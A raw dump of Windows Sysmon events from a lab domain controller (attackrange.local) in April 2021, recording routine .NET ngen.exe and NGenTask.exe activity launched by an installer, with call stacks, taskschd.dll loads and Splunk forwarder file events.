14:57:19.874{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-CB0B-00000000BB01}3664c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.858{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-CA0B-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.858{A7A01FEF-EBCF-607E-BF0B-00000000BB01}44886480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{A7A01FEF-EBCF-607E-CA0B-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+35491|UNKNOWN(00007FF803265A07) 10341000x800000000000000073585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.858{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C80B-00000000BB01}1512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.858{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C80B-00000000BB01}1512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.858{A7A01FEF-EBCF-607E-C80B-00000000BB01}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.827{A7A01FEF-EBCF-607E-C90B-00000000BB01}71044132C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-C80B-00000000BB01}1512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.827{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C90B-00000000BB01}7104C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.827{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C80B-00000000BB01}1512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.827{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-C80B-00000000BB01}1512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.811{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C60B-00000000BB01}4508c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.811{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C60B-00000000BB01}4508c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.811{A7A01FEF-EBCF-607E-C60B-00000000BB01}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.796{A7A01FEF-EBCF-607E-C70B-00000000BB01}60087020C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-C60B-00000000BB01}4508c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.780{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C70B-00000000BB01}6008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.780{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C60B-00000000BB01}4508c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.780{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-C60B-00000000BB01}4508c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000073571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.780{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8D981DD59C176C3D9B5BBD2065F4CC36,SHA256=50E63679EB0A11604D80BAA1F1929672D7FF0A53A93EAA66503A9E34D9C09103,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.765{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C40B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.765{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C40B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.765{A7A01FEF-EBCF-607E-C40B-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.749{A7A01FEF-EBCF-607E-C50B-00000000BB01}63486016C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-C40B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000073566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.749{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AAF5939673FAA3B62011D3EE916E244,SHA256=F12645E21D2084C3B4845300A542D3FFD2B76B9DEBA5EF7930D07BD4887C9218,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.733{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C50B-00000000BB01}6348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.733{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C40B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.733{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-C40B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.718{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C20B-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.718{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-C20B-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.718{A7A01FEF-EBCF-607E-C20B-00000000BB01}6656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.702{A7A01FEF-EBCF-607E-C30B-00000000BB01}69683688C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-C20B-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.702{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C30B-00000000BB01}6968C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-EBCF-607E-C10B-00000000BB01}3984436C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-BE0B-00000000BB01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-EBCF-607E-C00B-00000000BB01}65486336C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-BF0B-00000000BB01}4488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.686{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-C20B-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 